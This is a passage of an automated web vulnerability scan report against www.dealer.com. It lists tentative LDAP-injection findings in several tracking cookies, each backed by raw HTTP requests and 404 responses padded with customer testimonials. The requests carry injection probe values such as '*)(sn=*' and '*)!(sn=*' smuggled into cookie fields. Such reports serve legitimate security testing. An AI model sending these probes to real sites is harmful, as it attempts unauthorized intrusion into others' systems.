Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20356
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003737; expires=Mon, 16-Apr-2012 01:28:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/u
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)!(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20027
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="
...[SNIP]...
1.7. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMAWebCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMAWebCookie cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMAWebCookie cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20042
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real hum
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20134
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight
...[SNIP]...
1.8. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/powermail/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads d62447ad87cf5458)(sn=* and d62447ad87cf5458)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20162
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video S
...[SNIP]...

Request 2

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)!(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20238
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSi
...[SNIP]...
1.9. http://www.dealer.com/products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/contact/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads c57a1dde651b3a70)(sn=* and c57a1dde651b3a70)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./company/contact/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
